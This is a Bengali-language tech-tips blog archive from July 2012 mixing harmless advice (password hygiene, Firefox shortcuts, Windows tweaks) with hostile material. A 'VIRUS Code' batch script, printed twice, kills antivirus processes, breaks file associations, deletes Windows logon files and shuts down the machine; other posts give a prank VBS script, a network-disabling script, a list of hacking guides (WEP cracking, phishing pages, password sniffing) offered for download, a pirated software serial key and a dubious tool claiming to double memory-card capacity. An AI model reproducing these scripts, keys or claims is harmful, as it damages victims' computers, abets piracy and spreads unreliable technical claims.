শনিবার, ২৮ জুলাই, ২০১২

আপনার ই-মেইল ঠিকানা কি নিরাপদ?

ই-মেইল ঠিকানা করার সময়কিছু সাধারণ নিরাপত্তামূলক প্রশ্ন পাওয়া যায়। যেমন আপনার প্রিয় লেখকের নাম, আপনার প্রথম স্কুলের নাম, আপনার প্রথম ফোন নম্বর ইত্যাদি। এগুলোর উত্তরও সাধারণত কমন হয়। যেমন আপনার প্রথম স্কুলের নাম, আপনার প্রথম ফোন নম্বর, আপনার প্রিয় লেখকের নাম ইত্যাদি প্রশ্নের উত্তর অনেকেরই জানা থাকে। তা ছাড়া দু-চারজন কমন লেখকের নাম সবাই ব্যবহার করে।
আবার অনেকেই তাদের ই-মেইল, ফেসবুক ঠিকানার পাসওয়ার্ড ব্যবহার করেন নিজের নাম, নামের প্রথম অংশ, নামের শেষ অংশ, নামের শেষে রোল নম্বর, বছর, ঘনিষ্ঠ বন্ধুর নাম, মোবাইল নম্বর, abcdef, ১২৩৪৫৬ ইত্যাদি। এসব পাসওয়ার্ড ব্যবহার করলে ই-মেইল আইডি হ্যাকিং হওয়ার সম্ভাবনা বেশি থাকে।

প্রতিকার:
 নিরাপত্তা প্রশ্নের উত্তরে এমন উত্তর লিখবেন যাতে কেউ ধারণা করতে না পারে। যেমন আপনার প্রিয় লেখকের নাম এর উত্তরে অন্য কোনো নাম লিখতে পারেন। নামটি যত বড় হয় ততই ভালো।
 পাসওয়ার্ড নির্বাচনের ক্ষেত্রেও বড় পাসওয়ার্ড লিখবেন এবং তাতে বর্ণ, সংখ্যা, ডট, কমা, ডলার সাইন ইত্যাদির মিশ্রণ থাকলে ভালো হয়। ডিকশনারিতে পাওয়া যায় এমন শব্দ পাসওয়ার্ড হিসেবে ব্যবহার করবেন না। যেমন: Education, University ইত্যাদি।
 যেসব কম্পিউটার একাধিক মানুষ ব্যবহার করে সেসব কম্পিউটারে লগইন করার সময় ব্রাউজার থেকে ‘আপনার পাসওয়ার্ড সেভ করতে চান কি না’ বার্তা আসলে No-তে ক্লিক করবেন এবং কাজ শেষে করে লগআউট করতে ভুলবেন না।
 ই-মেইল ঠিকানায়, ফেসবুক অ্যাকাউন্টে অলটারনেটিভ ই-মেইল নামে একটি অপশন থাকে সেখানে আপনার অন্য একটি ই-মেইল আইডি দিন এবং মোবাইল নম্বর অপশনে মোবাইল নম্বর যোগ করুন। তাহলে কেউ যদি আপনার ই-মেইল আইডি বা ফেসবুক অ্যাকাউন্ট হ্যাক করে তখন সঙ্গে সঙ্গে আপনার অন্য ই-মেইলে মেসেজ চলে আসবে।
তখন আপনি আপনার অ্যাকাউন্ট আবার পুনরুদ্ধার করতে পারবেন। তবে খেয়াল রাখবেন যাতে দুটি ই-মেইল আইডির পাসওয়ার্ড এবং নিরাপত্তা প্রশ্নের উত্তর একই না হয়।

উইন্ডোজ ৭-এ লুকানো ফাইল দেখুন

উইন্ডোজ ৭-এ লুকানো (হিডেন) ফাইল দেখতে (শো করতে) প্রথমে কম্পিউটার চালু করুন। তারপর Start-এ ক্লিক করে All Programs-এর নিচে সার্চ বক্সে Folder Options লিখুন। এন্টার করলে Folder Options খুলবে।
এখন View-তে ক্লিক করুন এবং নিচে থেকে Show hidden files, folders or drive নির্বাচন করুন এবং Apply ক্লিক করুন। তারপর OK ক্লিক করুন। এখন কম্পিউটারে হিডেন ফাইল দেখা যাবে।

বৃহস্পতিবার, ২৬ জুলাই, ২০১২

ফায়ারফক্সের কিছু শর্টকাট

সরাসরি ওয়েব লিখতে Ctrl + L
নতুন পৃষ্ঠা খুলতে Ctrl + N
নতুন ট্যাব খুলতে Ctrl + T
পরবর্তী ট্যাবে যেতে Ctrl + Tab
আগের ট্যাবে যেতে Ctrl + Shift + Tab
ট্যাব বন্ধ করার জন্য Ctrl + W
পেজ সেভ করতে Ctrl + S
পেজ রিলোড অথবা রিফ্রেশ করতে F5
স্ক্রিনজুড়ে ফায়ারফক্স দেখতে F11
হোম পেজে যেতে চাইলে Alt + Home
বুকমার্ক করতে চাইলে Ctrl + D
সরাসরি সার্চ বক্সে যেতে Ctrl + K
লেখাকে বড় করতে চাইলে Ctrl + =
লেখাকে ছোট করতে চাইলে Ctrl + –
পেজের নিচের দিকে আসতে চাইলে Spacebar
পেজের ওপরের দিকে আসতে চাইলে Shift + Spacebar
ওয়েব পেজে কোনো কিছু খুঁজতে চাইলে Ctrl + F
ব্রাউজিং হিস্টোরি দেখতে Ctrl+ H
ডাউনলোড লিস্ট দেখতে Ctrl+ J
কম্পিউটার থেকে কোনো ফাইল খুলতে Ctrl+ O
ওয়েব পেজ প্রিন্ট নিতে Ctrl+ P
পরের শব্দ খুঁজতে চাইলে Alt + N
স্বয়ংক্রিয়ভাবে ওয়েব ঠিকানার আগে-পরে www ও .com বসাতে—
.com-এর ক্ষেত্রে Ctrl + Enter
.net-এর ক্ষেত্রে Shift + Enter ও
.org-এর ক্ষেত্রে Ctrl + Shift + Enter বসালেই হবে।

গুগলে `বৈজ্ঞানিক ক্যালকুলেটর'

দ্রুত হিসেব করার প্রয়োজন হলে এখন থেকে আর ক্যালকুলেটর বা গণনা যন্ত্র হাতড়ে বেড়াতে হবে না। গুগলের সার্চ বক্সে হিসেবের জন্য সংখ্যাগুলো লিখলেই বা ইংরেজিতে ‘ক্যালকুলেটর’ নামে সার্চ দিলেই মিলবে একটি বৈজ্ঞানিক ক্যালকুলেটর। ব্যবহারকারীদের সুবিধার্থে বৈজ্ঞানিক এ ক্যালকুলেটর ফিচারটি যুক্ত করেছে গুগল।
৩৪ টি বাটন বা বোতামযুক্ত এ ক্যালকুলেটর ব্যবহার করে বৈজ্ঞানিক ক্যালকুলেটরের মতই যাবতীয় সব হিসেব করা যাবে। এতে সাইন, কস, ট্যান, রুট বাটন ছাড়া পাইয়ের জন্যও আলাদা বাটন রয়েছে।
গুগলের মোবাইল সংস্করণে ভয়েস সার্চ ফিচার ও গুগল ক্রোম ব্যবহার করে স্পর্শ ছাড়াও এতে হিসেব করা যাবে।
সম্প্রতি গুগলের টুইটার অ্যাকাউন্ট থেকে পাণ্ডা এলগরিদম আপডেট (৯.৩ সংস্করণ) এর ঘোষণাও দিয়েছে প্রতিষ্ঠানটি। এ এলগরিদমটির সাহায্যে যেসব ওয়েবসাইটের মান কম, সেগুলোর র্যাঙ্কিং কম দেখায় আর ভালো মানের ওয়েবসাইটগুলো সার্চ রেজাল্টের প্রথমে দেখায়। প্রসঙ্গত, ২০১১ সালের ফেব্রুয়ারি মাসে পাণ্ডা চালু করেছিল গুগল।

বুধবার, ২৫ জুলাই, ২০১২

সব কিছু পিছনে ফেক ভাইরাস।

আপনার নোটপ্যাড ওপেন করুন এর নিচের কোড টি কপি করে পেস্ট করুন।এবার এটা all files এ anything.bat নামে সেভ করুন।
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.

মঙ্গলবার, ২৪ জুলাই, ২০১২

IP address vanish by applying a simple program

এই কোডটি আসলে কোন VIRUS নয়। এই প্রোগ্রামটি Open করলে কম্পিউটার এর Internet Connection বন্ধ হয়ে যাবে। কারণ এটা কম্পিউটার এর IP Address মুছে দেয়। এর IP Address না থাকলে Internet Connection ও বন্ধ হয়ে যায়। প্রোগ্রাম টি তৈরি করতে –

১. Open Notepad
২. নীচের কোডটি Type করুন।
1@Echo off
2 Ipconfig /release
৩. এরপর ipoff.bat নামে save করুন।
ব্যাস এবার প্রোগ্রাম টি open করলেই …।
দয়া করে এর মাধ্যমে কারো ক্ষতি করবেন না।
আর একটি
আর একটি কোড দেওয়া হল যার মাধ্যমে IP Address মুছে গেলে এবার ঠিক করতে পারবেন।
১. Open Notepad.
২. নীচের কোডটি type করুন।
1@Echo off
2 Ipconfig / renew
৩. এরপর ipon.bat নামে save করুন।
বিঃদ্রঃ কোডটি শুধু মাত্র Windows XP তে কাজ করবে।

HTML শেখার জন্য একটি PDF ফাইল ডাউনলোড করে নিন (সম্পুর্ণ বাংলায়)

PDF ফাইলটির মাধ্যমে আপনি
  • এলিমেন্ট
  • ট্যাগ
  • এট্রিবিউট
  • অনুচ্ছেদ
  • শিরোনাম
  • লাইনব্রেক
  • তালিকা
  • কালার কোড
  • ফন্ট
  • লিংক
  • ইমেইল
  • ইমেইল লিংক
  • এনটাইটি
  • মন্তব্য
  • ছবি
  • টেবিল
  • রং
  • ব্যাকগ্রাউন্ড
  • ফ্রেম
  • লে আউট
  • মিউজিক
  • ভিডিও
  • বডি
  • ভিউ
  • ফর্ম
  • আপলোড
  • ড্রপডাউন
  • লিস্টPDF ফাইলটি মাত্র ৪৫৮KB
    PDF ফাইলটি ডাউনলোড করতে এখানে ক্লিক করুন

সোমবার, ২৩ জুলাই, ২০১২

কম্পিউটার এর সব চেয়ে গুরুত্বপূর্ণ টিপস

কম্পিউটার টিপস :
1. How To Change Your Folders Background
2. How To Chat With Friends Through CMD (Netsend)
3. How To Close Ports
4. How To Crack A Router For Username And Password
5. How To Crack A WEP Encryped Wireless Network On Windows Vista
6. How To Crack WEP In Linux
7. How To ”Deface” A Guestbook With HTML-Injection
8. How To Deface With Tamper Data
9. How To Get IP’s Through The Steam Client
10. How To Get Passes To Pornsites
11. How To Get Past Your School Blocking System Without Programs
12. How To Get Unlimited Time In Internet Café’s
13. How To Grab IP Address With PHP
14. How To Hack An Administrator Account With A Guest Account
15. How To Hack Into A Computer On LAN
16. How To Hack Passwords Using USB Drive
17. How To Hack Someone With His IP Address
18. How To Hack WEP wifi Passwords
19. How To Hide Files In A jpg
20. How To Kick Everyone From A Counter Strike Source Server
21. How To Kick Someone Of A Wireless Network (Must be LAN-Admin)
22. How To Make A Folder Lock Without Any Software
23. How To Make A Phisher For A Website
24. How To Make Mozilla Firefox 30 Times Faster
25. How To Make Your Name Stay In The Task Bar
26. How To Rename Your Recycle Bin
27. How To Reveal Asterisk Passwords Using Javascript
28. How To Shutdown A Computer With A Cell Phone
29. How To Sniff Password With Cain And Abel
30. How To Use A Trial Program Forever Without Activation
31. How To Use Cain & Abel To Get Local Passwords
32. How To Use Your First Web Exploit

এখানে ক্লিক করে ডাউনলুড করুন সব উত্তর

এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন

প্রথমে সফটওয়্যারটি ডাউনলোড করে নিন এইখান থেকে
তারপরে সফটওয়্যারটি install করেন এবং  উইন্ডোজ ৭ এর সিডি কপি করেন আপনার কম্পিউটারের যেকোনো ড্রাইভে… 
১)এখন সফটওয়্যারটি ওপেন করেন Browse থেকে Select OS Path ক্লিক করেন তারপরে উইন্ডোজ সেভেনের ফোল্ডার এড করেন . (আপনার কাছে যদি উইন্ডোজ সেভেনের ( ISO ) ফাইল থাকে তাহলে Select IOS Path এ ক্লিক করেন)…
rt1 এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
 ২) এইবার  উইন্ডোজ সেভেনের ফোল্ডার টি সিলেক্ট করেন।
rt4 এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
কিছুক্ষণ অপেক্ষা করেন নিচে দেখবেন  Status: Loading Windows Completed  তারপরে ৩) Task বাটুনে ক্লিক করে Select All  এ ক্লিক করেন।
rt2 এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
৪)Entegration= ট্যাবে গেলে যা যা হয়=  এখান থেকে আপনি Update Pack, Driver, Language Pack এবং যেকোনো সফটওয়্যার এড করতে পারবেন যেমন নিছে দাখেন আমি কিছু সফটওয়্যার এড করেছি.
integration+buton এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
একইরকম ভাবে Update Pack এবং Language pack(add) এড করতে পারবেন  ।
 ৫) Features Removal ট্যাবে গেলে যা যা হয়= এইখান থেকে অনেক কিছু রিমুভ এবং এড করতে পারবেন যেমন = windows media player, Autoplay windows ISO Burn,  Photo Viewer  আরও অনেক কিছু… দয়াকরে ইকটু নিজে নিজে সব ভালো ভাবে দাখেন তাহলে ভালো হবে….।
features+removal এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
৬) Tweaksট্যাবে গেলে যা যা করতে পারবেন=  এইখান থেকে সবরকম সিস্টেম পরিবর্তন করা যাবে যেমন, নিচের  পিকচার দাখেন।
Tweaks এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
 ৭)Un-Attended=  ট্যাবে যা যা হয় নিছের পিকচারে দেওয়া আছে…।
Un Atended এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
৮)Costomization “ট্যাবে যা যা হয়= সবচাইতে মজার জাইগা এইটা” এইখান থেকে  Screensaver, Themes, Logon Screen, Gadged Document, Samples Music, and Media Sounds  ( Add  And  remove) এড এবং রিমুভ  করা যাবে ।
customization1 এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
৯_More Option ট্যাবে যা যা হয়১= উইন্ডোজ মিডিয়া প্লেয়ারের স্কিন পরিবর্তন হবে (২= উইন্ডোজ install করার সময় যাই ব্যাকগ্রাউন্ড ফটো থাকে সেটা পরিবর্তন হবে (৩=  explore Back and Forward buton পরিবর্তন হবে, (৪= উইন্ডোজ মিডিয়া সেনটারের ব্যাকগ্রাউন্ড  পরিবর্তন হবে। (৫= start menu orb টাস্ক বারে যেই Start Buton থাকে তাকে  start menu orb bole (৬=shell32.dll আপনার কম্পিউটারে জত রকম আইকন (icon) থাকে এই shell32.dll  ফাইলের ভিতরে থাকে।
customization2 এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন
Final Step
১০)ISO Bootable= নিচের পিকচার দখেন তাহলে হবে ।
final এইবার আপনার নিজের ইচ্ছা মত windows 7 & Vista তৈরী করেন

ফায়ারফক্সের জন্য বাংলা টু ইংরেজী ডিকশনারী

আমরা যারা ইন্টারনেটে কাজ করি তাদের প্রতিদিনই অনেক ইংরেজী আর্টিকেল পড়তে হয়। আবার ইংরেজী আর্টিকেল পড়তেও অনেক সমস্যার সম্মুখিন হতে হয়।
যেমন- ইংরেজী শব্দের অর্থ জানা। যারা গুগোল ট্রান্সলেটর সম্পর্কে জানেন তারাতো মোটামোটি একটু তাড়াতাড়িই শব্দের অর্থ বের করতে পারেন। কিন্তু যারা এটা সম্পর্কে জানেন না, তাদেরতো আর নিজের ডিকশনারী বই ছাড়া আর কোন উপায় নাই। আবার গুগোল ট্রান্সলেটর ব্যবহার করলেও তেমন আরাম নাই, ঐখানে যাওয়া তারপর দেখা, এটা অনেকটা ঝামেলামূলক কাজ। কিন্তু আপনি যদি ফায়ারফক্স ব্যবহার করেন তাহলে এর একটা Addon ব্যবহার করে আপনি মূহুর্তের মধ্যেই যেকোন ইংরেজী শব্দের বাংলা অর্থ খুজে পেতে পারেন।

এই Addon টির নাম হল- “English To Bangla Dictionary”.
Addon টি পাওয়ার জন্য আপনার ফায়ারফক্স ব্রাউজার অপেন করে “এখানে ক্লিক” করুন।
Addons এর পেজটি ওপেন হওয়ার পর “Add to Firefox” বাটনে ক্লিক করুন।
bangla to english addon 1 ফায়ারফক্সের জন্য বাংলা টু ইংরেজী ডিকশনারী
এডঅনটির ডাউনলোড কমপ্লিট হয়ে গেলে “Install” বাটনে ক্লিক করুন।
bangla to english addon 2 ফায়ারফক্সের জন্য বাংলা টু ইংরেজী ডিকশনারী
এবার, আপনি যে শব্দটির অর্থ খুজছেন সেটি সিলেক্ট করে রাইট বাটনে ক্লিক করুন এবং “Get Bangla Meaning” অপশনে ক্লিক করুন এবং দেখুন আপনার ফায়ারফক্সের যাদু।
bangla to english addon 3 ফায়ারফক্সের জন্য বাংলা টু ইংরেজী ডিকশনারী
বাংলা মিনিংয়ের বক্সটি বন্ধ করতে আপনার ব্রাউজারের যেকোন জায়াগায় ক্লিক করলেই চলবে।

VIRUS Code: একাই ধ্বংসের করবে বহু কিছু

অনেক Virus ই রয়েছে যা কম্পিউটার এ একবার ঢুকে গেলে Operating System নতুন ভাবে Install দেওয়া লাগবেই। এটাও এমন।এই Virus Code এর মাধ্যমে যে ক্ষতিকর প্রোগ্রামটি তৈরি হবে তা যদি কম্পিউটার এ একবার ঢুকে যায় এটা আপনাকে এমন বিরক্ত করবে যে আপনি Operating System নতুন ভাবে Install দিতে বাধ্য।

এই প্রোগ্রাম এর কাজঃ
*কম্পিউটার এর Taskbar ও Icon সব অদৃশ্য করে দিবে।
*সকল .exe ফাইলকে Notepad এ পরিবর্তন করে ফেলবে।
*সকল text ফাইলকে Win Amp or WMP তে পরিবর্তন করে ফেলবে।
* Login / Logoff Screen মুছে ফেলবে।
*আরও অনেক ক্ষতি করবে।
১. Open Notepad
২. কোড গুলো Type করুন।
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown
৩. এবার installhack.bat নামে Save করুন।
দয়া করে এর মাধ্যমে কারো ক্ষতি করবেন না।
অনেক Virus ই রয়েছে যা কম্পিউটার এ একবার ঢুকে গেলে Operating System নতুন ভাবে Install দেওয়া লাগবেই। এটাও এমন।এই Virus Code এর মাধ্যমে যে ক্ষতিকর প্রোগ্রামটি তৈরি হবে তা যদি কম্পিউটার এ একবার ঢুকে যায় এটা আপনাকে এমন বিরক্ত করবে যে আপনি Operating System নতুন ভাবে Install দিতে বাধ্য।
এই প্রোগ্রাম এর কাজঃ
*কম্পিউটার এর Taskbar ও Icon সব অদৃশ্য করে দিবে।
*সকল .exe ফাইলকে Notepad এ পরিবর্তন করে ফেলবে।
*সকল text ফাইলকে Win Amp or WMP তে পরিবর্তন করে ফেলবে।
* Login / Logoff Screen মুছে ফেলবে।
*আরও অনেক ক্ষতি করবে।
১. Open Notepad
২. কোড গুলো Type করুন।
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown
৩. এবার installhack.bat নামে Save করুন।
দয়া করে এর মাধ্যমে কারো ক্ষতি করবেন না।

কোন সফটওয়্যার ছাড়াই ইউটিউব এর ভিডিও হরেক ফরমেট এ ডাউনলোড করুন!

প্রথমে আপনার কাঙ্খিত ভিডিও টি ইউটিউব এর যে পেইজ এ আছে তাতে যান। ধরুন আপনার পেইজ এর লিঙ্ক
এখন www. এর জায়গায় ss দিন। অর্থাৎ,ssyoutube.com/watch?v=SAp8datqnW4  । এখন রিলোড করুন।
এবার কাঙ্খিত ফরমেট এ ক্লিক করলেই ডাউনলোড শুরু হয়ে যাবে।

ঘড়ি AM PM দেখতে দেখতে হাপিয়ে গেছেন

আপনার মনিটর এর নিচে ডান কুনাই ঘড়ি আছে আর এই ঘড়ি AM PM দেখতে দেখতে হাপিয়ে গেছেন তাই, আজ আমরা AM PM পালটে দেব……………………………..
আপনার মনিটর এর নিচে ডান কুনাই ঘড়ি আছে, click করন, change date and time যে window আসবে সেখানে
আবার change date and time
এ click করন। এবার যে উইন্ডো আসবে সেখানে, change calender setting এ ক্লিক ,
এবার যে উইন্ডো আসবে সেখানে দেখুন ওপরে tab ========= Numbers, currency, time , date.

Time এ ক্লিক করুন, এখন নিচে দেখুন, am symbol এবং pm symbol এখানে AM এবং PM বদল করে আপনার নাম দিন অথবা  সকাল , বিকাল…..
এবার apply দিন ok দিন … আপনার কাজ শেষ………………………………..।।
এখন দেখুন……।।

laptop চালাবেন মোবাইল Remote Control দিয়ে………….. আপনার শুধু একটা Bluetooth মোবাইল থকলেই হবে…

এর নাম vectir জা আপনি মোবাইল ও ল্যাপ্টপ এ setup করে নিন

pc এর জন্য ডাউনলোড করুন   http://www.vectir.com/download/pc/
মোবাইল এর জন্য  ডাউনলোড করুন  http://www.vectir.com/download/mobile/mobile-bluetooth-remote-control/

laptop টি restart দিন ।
মোবাইল এ program টা অন করুন,
laptop er সাথে add করুন।
desktop select করন
আপনার কাজ শেষ…
এখন আপনার laptop চালান মোবাইল ই
r laptop  এর মনিটর এর ভিডিও দেখুন মোবাইল এর মনিটরএ…।

গুগল অ্যাডসেন্স নিন খুব সহজে

google adsense12 গুগল অ্যাডসেন্স নিন খুব সহজে
1.এই লিঙ্ক এ ক্লিক করুন। Register NOW. এই সাইট এ গিয়ে প্রথমে register now button এ ক্লিক করে register করতে হবে।
2.Register হয়ে গেলে ইমেইল অ্যাড্রেস এ গিয়ে verify করতে হবে।
3.তারপর edit profile এ গিয়ে সব প্রোফাইল complete করতে হবে।
4.এই সাইট এ সর্বনিম্ন ২-৩ টা unique পোস্ট করতে হবে।
5.বাম দিকে Adsense sharing বাটনে ক্লিক করে নতুন অ্যাডসেন্স অ্যাকাউন্ট বানাতে হবে।
আর কিছু না, শুধু ৪-৬ ঘণ্টা সময় কাটাতে হবে এবং আবার ইমেইল চেক করুন …
“congratulation..your Google AdSense account is Approve”

এবার আয় করুন গুগল অ্যাডসেন্স থেকে।

Convert 1GB Memory Card to 2GB

Before:

After : 
For Convert 1GB Memory Card to 2GB Just Follow The Instruction....
1. First Backup your 1GB memory card data. After backup format that memory card.
2. Download 1GB-2GB Software from this post.
3. Extract This Software.
4. Open that software.
5. Now select your memory card (G1) on that software then you will see total space 955mb
6. Select Fix then it will start processing.
<view Before Format Photo>
7. It will ask you, " Do you really agree "
Select Yes.
8. Then It will be format & tell you remove memory card from desktop.
9. Remove memory card & Input again.
10. Now Check your memory card properties.
11. Now you will see your memory card properties 1912mb
.
DOWNLOAD : 1GB to 2GB_(MetLob.CoM).zip

...........€njoy

রবিবার, ২২ জুলাই, ২০১২

পেনড্রাইভ কে NTFS হিশেবে ফরম্যাট করার নিয়ম

1. Right click My Computer and select Manage.
2. Open the Device Manager and find your USB drive under the Disk Drives heading.
device manager পেনড্রাইভ কে NTFS হিশেবে ফরম্যাট করার নিয়ম
3. Right click the drive and select Properties.
4. Choose Policies tab and select the “Optimize for performance” option.
device optimize1 পেনড্রাইভ কে NTFS হিশেবে ফরম্যাট করার নিয়ম
5. Click OK.
6. Open My Computer.
7. Select Format on the flash drive
.format ntfs পেনড্রাইভ কে NTFS হিশেবে ফরম্যাট করার নিয়ম
8. Choose NTFS in the File System dropdown box.
4 পেনড্রাইভ কে NTFS হিশেবে ফরম্যাট করার নিয়ম
9. Device Formatting is completed.

Office 2007 -এ একটি ছোট add-in setup দিয়ে pdf ফাইল তৈরী করুন

doc to pdf1 300x289 Office 2007  এ একটি ছোট add in setup দিয়ে pdf ফাইল তৈরী করুন
আবার সালাম সবাইকে ! আশা করি সবাই ভালো আছেন । আমিও আপনাদের দোয়া ও ভালবাসার মাধ্যমে ভালো আছি ।
আজকে  একটা কমন Problem  নিয়ে Tutorial লিখছি, আমরা সবাই কম বেশি লেখা লেখির কাজ করে থাকি, অফিসে বা পারসনাল কাজে pdf  ফাইল এ করা লাগে। যেমন ধরুন আপনি একটি Microsoft Office 2007  এ একটি document  লিখেছেন, But এটাকে pdf করতে হবে, মজার বেপার হলো Microsoft Office ২০০৭ কোনো pdf ফাইল ফরম্যাট নেই।
ok ……….. তাহলে দেখুন কিভাবে ছোট একটি Add-in নিয়া সহজে pdf  করা যায়
১. প্রথমে এই লিঙ্ক থেকে Add-in  টি Download করে নিন এবং সেটাপ দিন
২. তারপর office ২০০৭ ওপেন করুন, প্রয়োজনীয় লেখা লিখে- save as > save as type : এ pdf(*.pdf) সিলেক্ট করুন > save  (fig1 ফলো করুন) !fig1
fig1 Office 2007  এ একটি ছোট add in setup দিয়ে pdf ফাইল তৈরী করুন  

office ২০০৩ এর জন্য http://www.a-pdf.com/word-to-pdf/a-pdf-wp.exe এই লিঙ্ক টি ব্যবহার করতে পারেন।

blogging-contest খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!

মেমোরি কার্ড এ আমরা অনেক ডাটা সংরক্ষণ করি যা হারিয়ে গেলে আমাদের বিপাকে পরতে হয়।তাই আজ আপনাদের জন্য একটি ছোট্ট সফটওয়্যার নিয়ে এসেছি। এই সফটওয়্যারটি দিয়ে আপনি আপনার মেমোরি কার্ডের সকল হারিয়ে যাওয়া ডাটা উদ্ধার করতে পারবেন খুব সহজেই। সফটওয়্যারটির নাম CardRecovery সফটওয়্যারটি আপনার ফরম্যাট, হারিয়া যাওয়া ডাটা, নষ্ট হওয়া ফাইলগুলো রিকভার করে ফেলবে মেমোরি কার্ড থেকে নিমিষেই। সফটওয়্যারটি সকল ধরনের মেমোরি কার্ড সাপোর্ট করে। যেমনঃSD (Secure Digital) Card, CF (Compact Flash) Card, xD Picture Card, Memory Stick, SmartMedia Card, MMC (MultiMediaCard), MicroSD, MiniSD, SDHC।
* Software টি দিয়ে যে সকল কাজ করতে পারবেন :
মেমোরি কার্ড থেকে ডিলেট, নষ্ট, ফরম্যাট হওয়ার ফলে হারিয়ে যাওয়া ছবি, মুভিসহ যে কোন ডাটা রিকভার করতে পারবেন।
যে কোন ফ্ল্যাস ড্রাইভ থেকেও রিকভার করতে পারবেন ডাটা।
মোবাইল ফোন থেকে ডিলেট হওয়ার ছবি ও মুভিও রিকভার করতে পারবেন।
* স্বাগতম – CardRecovery একটি বন্ধুত্বপূর্ণ ব্যবহারকারী ইন্টারফেস আছে. এটা খুব সহজ ভাবে ব্যবহার করতে.
card recovery main খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
Step 1 – ড্রাইভ ব্যবহারকারীদের চিঠি, থেকে উদ্ধার ফাইল সংরক্ষণ ক্যামেরা টাইপ এবং গন্তব্য ফোল্ডারটি নির্বাচন করুন.
card recovery step1 খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
Step 2 – CardRecovery সম্পূর্ণরূপে আপনার মেমরি কার্ড স্ক্যান করা হবে. স্ক্যানের প্রক্রিয়া খুবই দ্রুত এবং মাত্র তিন মিনিটের সম্পূর্ণরূপে আমাদের পরীক্ষায় একটি 1GB SanDisk এসডি কার্ড স্ক্যান লাগে.
3 খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
Step 3 – CardRecovery আপনি এবং পূর্বরূপ সঞ্চয় আগে প্রয়োজন ছবি নির্বাচন করা যাবে.
card recovery step3 খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
Complete – গন্তব্য ফোল্ডারটি থেকে CardRecovery উদ্ধার ছবি পরিমাণ সঞ্চয় হয়.
card recovery complete খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
downlo10 খুব সহজে Recover করুন মেমোরি কার্ড থেকে হারিয়ে যাওয়া সব ডাটা সাথে Serial Key সহ বুঝে নিন!!!!
Serial Key:
CYTG57SB1-GJJG6F5H9C2M87-T658TFJEMQTDS3E

এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র

সব ধরনের বিদ্যুৎ উৎপাদন কেন্দ্রে পড়ন্ত পানি, কয়লা, প্রাকৃতিক গ্যাস, তেল কিংবা পারমাণবিক জ্বালানীর শক্তিকে কাজে লাগিয়ে জেনারটরের মাধ্যমে বিদ্যুৎ উৎপন্ন করা হয় (ব্যতিক্রম: সৌর বিদ্যুৎ কেন্দ্র)। বিদ্যুৎ কেন্দ্রগুলো মূলত দুই প্রকার। হাইড্রলিক বা জলবিদুৎ এবং থার্মাল বা তাপবিদ্যুৎ কেন্দ্র। এছাড়া সৌর বিদ্যুৎ কেন্দ্র ও জিও-থার্মাল বিদ্যুৎ কেন্দ্রও এখন দেখা যায়।
তাপবিদ্যুৎ কেন্দ্রগুলো আবার জ্বালানীর উৎস ভিত্তিতে দুই রকম – জীবাশ্ম জ্বালানী বিদ্যুৎ কেন্দ্র এবং পারমাণবিক বিদ্যুৎ কেন্দ্র
